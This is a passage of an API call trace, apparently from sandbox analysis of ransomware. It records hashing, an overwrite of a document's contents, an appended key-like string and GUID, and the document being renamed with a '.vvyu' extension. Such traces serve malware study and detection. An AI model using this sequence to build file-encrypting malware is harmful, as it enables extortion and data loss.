(HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.809] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.809] GetLastError () returned 0x0 [0196.810] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.810] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0196.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.810] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.810] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.810] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18890) returned 0x2d4d778 [0196.811] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cfb0 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cff8 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.812] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0196.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a318 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a300 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0196.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0196.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.816] GetCurrentThreadId () returned 0x264 [0196.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0196.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d475f0 [0196.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84b70 [0196.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0196.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.817] GetCurrentThreadId () returned 0x264 [0196.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0196.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0196.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0196.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0196.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a318 [0196.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0196.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a378 [0196.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a390 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a330 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a300 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0196.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0196.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0196.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0196.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0196.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cff8 | out: hHeap=0x6a0000) returned 1 [0196.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.828] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4d778*, nNumberOfBytesToWrite=0x18880, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4d778*, lpNumberOfBytesWritten=0x30ffb14*=0x18880, lpOverlapped=0x0) returned 1 [0196.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d778 | out: hHeap=0x6a0000) returned 1 [0196.830] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x18885, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.830] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.831] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.831] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.831] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.832] CloseHandle (hObject=0x52c) returned 1 [0196.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47a88 [0196.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d3a670 [0196.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47a88 | out: hHeap=0x6a0000) returned 1 [0196.834] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\TawX51muD\\MGhT3.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\tawx51mud\\mght3.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\TawX51muD\\MGhT3.doc.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\tawx51mud\\mght3.doc.vvyu")) returned 1 [0196.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.836] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0196.838] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7bab580, ftCreationTime.dwHighDateTime=0x1d89f9d, ftLastAccessTime.dwLowDateTime=0xad6a5cf0, ftLastAccessTime.dwHighDateTime=0x1d8a1d3, ftLastWriteTime.dwLowDateTime=0xad6a5cf0, ftLastWriteTime.dwHighDateTime=0x1d8a1d3, nFileSizeHigh=0x0, nFileSizeLow=0x18885, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MGhT3.doc", cAlternateFileName="")) returned 0 [0196.838] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0196.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0196.839] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0196.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0196.839] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0196.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 